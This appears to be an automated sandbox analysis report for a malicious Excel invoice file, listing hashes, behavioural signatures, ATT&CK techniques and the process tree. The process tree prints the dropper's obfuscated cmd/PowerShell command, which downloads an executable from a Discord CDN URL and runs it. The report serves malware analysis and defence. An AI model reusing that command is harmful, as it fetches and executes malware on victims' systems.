Analysis

  • max time kernel
    148s
  • max time network
    47s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    27-11-2022 17:16

General

  • Target

    Invoice-N192793.xls

  • Size

    102KB

  • MD5

    a88329a0eca1ff4a5d59dd6270d08267

  • SHA1

    a812bbcb57431be5b0d436590ae4a53465bb1e25

  • SHA256

    bf57ecd7a6c0166dd27f311cebda08ed8e9305cfaa66fe68131ba29250ba94f3

  • SHA512

    a7bc77709e943d92af345073f639a54d195258020bf5b7ca178eae6b7c90a1d984f2af660aa6e5112ec8389ff0dd27493244e22540acc3ae80ac7792fe066ec5

  • SSDEEP

    3072:4k3hOdsylKlgryzc4bNhZFGzE+cL2knAk6vy/sUeo0JSpfiXa:4k3hOdsylKlgryzc4bNhZF+E+W2knAj

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\Invoice-N192793.xls
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1492
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c pow^ers^hell/W 01 c^u^rl htt^ps://cdn.discordapp.com/attachments/1036705838334746685/1046122909879513129/Sdcjiemg.e^xe -o C:\Users\Public\s2zq4.exe;C:\Users\Public\s2zq4.exe
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1720
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell /W 01 curl https://cdn.discordapp.com/attachments/1036705838334746685/1046122909879513129/Sdcjiemg.exe -o C:\Users\Public\s2zq4.exe;C:\Users\Public\s2zq4.exe
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:648

Network

MITRE ATT&CK Matrix ATT&CK v6

Defense Evasion

Modify Registry

1
T1112

Discovery

Query Registry

1
T1012

System Information Discovery

1
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/648-63-0x0000000000000000-mapping.dmp
  • memory/648-65-0x000000006BFF0000-0x000000006C59B000-memory.dmp
    Filesize

    5.7MB

  • memory/648-66-0x000000006BFF0000-0x000000006C59B000-memory.dmp
    Filesize

    5.7MB

  • memory/1492-54-0x000000002F561000-0x000000002F564000-memory.dmp
    Filesize

    12KB

  • memory/1492-55-0x00000000713D1000-0x00000000713D3000-memory.dmp
    Filesize

    8KB

  • memory/1492-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

  • memory/1492-57-0x0000000076121000-0x0000000076123000-memory.dmp
    Filesize

    8KB

  • memory/1492-58-0x00000000723BD000-0x00000000723C8000-memory.dmp
    Filesize

    44KB

  • memory/1492-59-0x00000000723BD000-0x00000000723C8000-memory.dmp
    Filesize

    44KB

  • memory/1492-60-0x000000000076A000-0x0000000000775000-memory.dmp
    Filesize

    44KB

  • memory/1492-61-0x000000000076A000-0x0000000000775000-memory.dmp
    Filesize

    44KB

  • memory/1720-62-0x0000000000000000-mapping.dmp